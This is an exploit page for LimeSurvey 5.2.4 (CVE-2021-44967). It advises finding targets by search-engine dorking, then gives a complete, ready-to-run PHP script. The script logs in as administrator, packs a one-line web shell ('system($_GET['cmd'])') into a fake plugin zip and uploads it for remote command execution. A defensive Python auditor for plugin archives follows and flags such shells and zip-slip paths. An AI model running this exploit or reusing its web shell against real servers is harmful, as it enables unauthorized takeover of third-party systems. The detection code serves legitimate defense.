LimeSurvey 5.2.4 Remote Code Execution

=============================================================================================================================================
| # Title : LimeSurvey 5.2.4 Remote Code Execution (reverse shell via malicious plugin upload) |
| # Author : indoushka |
| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 136.0.0 (64 bits) |
| # Vendor : https://www.limesurvey.org/ |
=============================================================================================================================================

POC :

[+] Dorking on Google or another search engine to find targets.

[+] Code description: this script exploits the plugin upload in LimeSurvey (CVE-2021-44967) to load a malicious PHP plugin. The archive only needs a config.xml to be accepted, so a .php file packed beside it lands under the web root; here that file is a one-line web shell that runs the command passed in the cmd parameter. Administrator credentials are required for the upload.

(Related : https://packetstorm.news/files/id/189288/ Related CVE numbers: CVE-2021-44967 ) .

[+] Save the code as poc.php.

[+] Set target: edit the $url, $username and $password variables at the end of the script.

[+] Usage : php poc.php

[+] Payload :

<?php

/**
 * PoC for CVE-2021-44967: an authenticated LimeSurvey administrator can
 * upload an arbitrary zip through the plugin manager. The archive only
 * needs a config.xml to be accepted, so any .php file packed next to the
 * manifest ends up on disk under the web root and gives command execution.
 *
 * The script logs in, builds such a zip in memory (config.xml plus a
 * one-line web shell) and submits it to the plugin manager upload form.
 */

// Session state shared by every request: the cookies handed out by the
// target (PHPSESSID and the Yii CSRF cookie) and the CSRF form token.
// file_get_contents() keeps no cookie jar of its own, so without this the
// login would never carry over to the upload.
$cookies = [];
$csrf_token = '';

// Pull every Set-Cookie header out of a response into the cookie jar.
function collect_cookies(array $headers) {
    global $cookies;
    foreach ($headers as $h) {
        if (preg_match('/^Set-Cookie:\s*([^=]+)=([^;]*)/i', $h, $m)) {
            $cookies[trim($m[1])] = $m[2];
        }
    }
}

// Build the Cookie: request header from the jar (empty before login).
function cookie_header() {
    global $cookies;
    $pairs = [];
    foreach ($cookies as $k => $v) {
        $pairs[] = "$k=$v";
    }
    return $pairs ? "Cookie: " . implode('; ', $pairs) . "\r\n" : '';
}

// One HTTP request with the session cookies attached. TLS verification is
// disabled so self-signed lab targets work; redirects are followed by PHP
// and $http_response_header contains the headers of every hop, so cookies
// set on the 302 after login are captured too.
function http_request($url, $method = 'GET', $body = '', $content_type = '') {
    $header = cookie_header();
    if ($content_type !== '') {
        $header .= "Content-Type: $content_type\r\n";
    }
    $ctx = stream_context_create([
        'http' => [
            'method'        => $method,
            'header'        => $header,
            'content'       => $body,
            'ignore_errors' => true, // keep the body of 4xx/5xx answers for diagnostics
        ],
        'ssl' => [
            'verify_peer'      => false,
            'verify_peer_name' => false,
        ],
    ]);
    $result = @file_get_contents($url, false, $ctx);
    if ($result === false) {
        echo "[-] Request to $url failed\n";
        exit(1);
    }
    collect_cookies($http_response_header);
    return $result;
}

// Plugin manifest: a config.xml with a random name is all the plugin
// manager checks before accepting the archive.
$plugin_name = "ExploitRCE_" . rand(1000, 9999);
$date = date("Y-m-d");
$xml_config = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
$xml_config .= "<config>\n";
$xml_config .= " <metadata>\n";
$xml_config .= " <name>$plugin_name</name>\n";
$xml_config .= " <type>plugin</type>\n";
$xml_config .= " <creationDate>$date</creationDate>\n";
$xml_config .= " <lastUpdate>$date</lastUpdate>\n";
$xml_config .= " <version>1.0</version>\n";
$xml_config .= " </metadata>\n";
$xml_config .= " <compatibility>\n";
$xml_config .= " <version>3.0</version>\n";
$xml_config .= " <version>4.0</version>\n";
$xml_config .= " <version>5.0</version>\n";
$xml_config .= " <version>6.0</version>\n";
$xml_config .= " <version>7.0</version>\n";
$xml_config .= " </compatibility>\n";
$xml_config .= "</config>";

// Log in to the LimeSurvey admin panel and keep the session.
function limesurvey_authenticate($url, $username, $password) {
    global $csrf_token;
    echo "[*] Logging in...\n";
    $login_url = "$url/index.php/admin/authentication/sa/login";

    // The login form carries the Yii CSRF token. Depending on how the view
    // renders the hidden input, name= may come before or after value=.
    $login_page = http_request($login_url);
    if (preg_match('/name="YII_CSRF_TOKEN"[^>]*value="([^"]*)"/', $login_page, $m)
        || preg_match('/value="([^"]*)"[^>]*name="YII_CSRF_TOKEN"/', $login_page, $m)) {
        $csrf_token = $m[1];
    } else {
        echo "[-] Could not find YII_CSRF_TOKEN on the login page\n";
        exit(1);
    }

    $data = http_build_query([
        "YII_CSRF_TOKEN" => $csrf_token,
        "authMethod"     => "Authdb",
        "user"           => $username,
        "password"       => $password,
        "login_submit"   => "login",
    ]);

    $result = http_request($login_url, 'POST', $data, 'application/x-www-form-urlencoded');

    // A successful login redirects to the admin index.
    if (strpos($result, '/index.php/admin/index') !== false) {
        echo "[+] Login successful\n";
    } else {
        echo "[-] Login failed\n";
        exit(1);
    }
}

// Upload the malicious plugin zip through the plugin manager. Yii validates
// the CSRF token on every POST, so it goes into the multipart body next to
// the file.
function upload_payload($url, $plugin_name, $payload) {
    global $csrf_token;
    echo "[*] Uploading malicious plugin...\n";
    $upload_url = "$url/index.php/admin/pluginmanager?sa=upload";

    $boundary = "----WebKitFormBoundary" . md5(uniqid('', true));
    $data  = "--$boundary\r\n";
    $data .= "Content-Disposition: form-data; name=\"YII_CSRF_TOKEN\"\r\n\r\n";
    $data .= "$csrf_token\r\n";
    $data .= "--$boundary\r\n";
    $data .= "Content-Disposition: form-data; name=\"the_file\"; filename=\"$plugin_name.zip\"\r\n";
    $data .= "Content-Type: application/zip\r\n\r\n";
    $data .= $payload . "\r\n";
    $data .= "--$boundary--\r\n";

    $result = http_request($upload_url, 'POST', $data, "multipart/form-data; boundary=$boundary");

    // On success LimeSurvey moves on to the uploadConfirm step.
    if (strpos($result, 'sa=uploadConfirm') !== false) {
        echo "[+] Upload accepted, LimeSurvey is at the uploadConfirm step\n";
    } else {
        echo "[-] Upload failed\n";
        exit(1);
    }
}

// Build the plugin archive in memory: the manifest plus a one-line web
// shell that runs whatever is passed in the cmd query parameter.
if (!class_exists('ZipArchive')) {
    echo "[-] The PHP zip extension is required\n";
    exit(1);
}
$payload = "<?php system(\$_GET['cmd']); ?>";
$zip = new ZipArchive();
$tmp = tempnam(sys_get_temp_dir(), "exploit");
$zip_file = "$tmp.zip";
$zip->open($zip_file, ZipArchive::CREATE);
$zip->addFromString("config.xml", $xml_config);
$zip->addFromString("payload.php", $payload);
$zip->close();
$payload_data = file_get_contents($zip_file);
unlink($zip_file);
unlink($tmp);

// Target settings: edit these before running.
$url = "http://target-limesurvey.com"; // base URL of the LimeSurvey instance, no trailing slash
$username = "admin";
$password = "password";

limesurvey_authenticate($url, $username, $password);
upload_payload($url, $plugin_name, $payload_data);

echo "[*] Done: plugin $plugin_name.zip uploaded\n";
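The PoC relies on the plugin manager accepting any archive that carries a config.xml, so a .php file packed beside the manifest lands under the web root. As an added defensive counterpart (example code written for this page, not part of the original PoC and not LimeSurvey's own installer), the Python script below audits a plugin zip before it is installed: it rejects zip-slip paths, requires a well-formed config.xml with a safe <name>, allows only the <name>.php class file as executable content, and greps that one file for command-execution sinks, since an attacker can simply name the shell after the plugin. The expected plugin layout (config.xml plus <name>.php, at the archive root or inside one top directory) and the sink list are assumptions, and the sample archives are constructed inline to mirror the zip the PoC builds.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

# Assumed benign layout (not from the page): config.xml plus one <name>.php
# class file, both at the archive root or inside a single top directory.
SAFE_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,63}$")
EXEC_EXT = (".php", ".phtml", ".phar", ".php3", ".php5", ".php7", ".inc")
# Heuristic sink list applied to the one PHP file a plugin may ship.
SINK = re.compile(
    r"\b(system|exec|passthru|shell_exec|popen|proc_open|eval|assert)\s*\(", re.I
)


def audit_plugin_zip(data: bytes) -> list:
    """Return a list of findings for a plugin archive; empty means clean."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a zip archive"]
    names = zf.namelist()

    # 1. Zip-slip: '..' components or absolute paths escape the plugin
    #    directory when the archive is extracted.
    for n in names:
        parts = n.replace("\\", "/").split("/")
        if n.startswith(("/", "\\")) or ".." in parts or re.match(r"^[A-Za-z]:", n):
            findings.append(f"path traversal entry {n!r}")

    # 2. config.xml is what the upload step validates; its <name> decides the
    #    plugin directory and class file name.
    plugin_name = None
    cfg = [n for n in names if n.count("/") <= 1 and n.split("/")[-1] == "config.xml"]
    if not cfg:
        findings.append("no config.xml")
    else:
        try:
            root = ET.fromstring(zf.read(cfg[0]))
            name = (root.findtext("metadata/name") or "").strip()
            if SAFE_NAME.match(name):
                plugin_name = name
            else:
                findings.append(f"unsafe plugin name {name!r}")
        except ET.ParseError:
            findings.append("config.xml is not well-formed XML")

    # 3. Only <name>.php may be executable. Anything else with a PHP
    #    extension is a dropped shell candidate (the PoC's payload.php); the
    #    class file itself is grepped for sinks.
    for n in names:
        if n.endswith("/"):
            continue
        base = n.split("/")[-1]
        if not base.lower().endswith(EXEC_EXT):
            continue
        if plugin_name and base == f"{plugin_name}.php" and n.count("/") <= 1:
            src = zf.read(n).decode("utf-8", "replace")
            for m in SINK.finditer(src):
                findings.append(f"{n}: calls {m.group(1)}()")
        else:
            findings.append(f"unexpected executable file {n!r}")
    return findings


# --- constructed sample archives (not from the page) -----------------------
def make_config_xml(name: str) -> str:
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<config><metadata><name>{name}</name><type>plugin</type>"
        "<version>1.0</version></metadata>"
        "<compatibility><version>5.0</version></compatibility></config>"
    )


def make_zip(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in entries.items():
            zf.writestr(path, content)
    return buf.getvalue()


def poc_style_zip() -> bytes:
    # Same shape as the PoC: manifest plus a one-line web shell.
    return make_zip({
        "config.xml": make_config_xml("ExploitRCE_1234"),
        "payload.php": "<?php system($_GET['cmd']); ?>",
    })


def renamed_shell_zip() -> bytes:
    # Shell named after the plugin, so the extension rule alone would pass it.
    return make_zip({
        "config.xml": make_config_xml("Pwn"),
        "Pwn.php": "<?php system($_GET['cmd']); ?>",
    })


def benign_zip() -> bytes:
    return make_zip({
        "Hello/config.xml": make_config_xml("Hello"),
        "Hello/Hello.php": "<?php\nclass Hello extends PluginBase {\n"
                           "    protected static $name = 'Hello';\n}\n",
    })


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else poc_style_zip()
    for f in audit_plugin_zip(data) or ["clean"]:
        print(f)
```

Run it as `python audit_plugin.py plugin.zip` against an archive pulled from the upload, or with no argument to see the PoC-style zip flagged. The sink grep is a heuristic and will name legitimate plugins that shell out; the path and layout checks are the hard rules, and a hit on either should stop the install.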




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸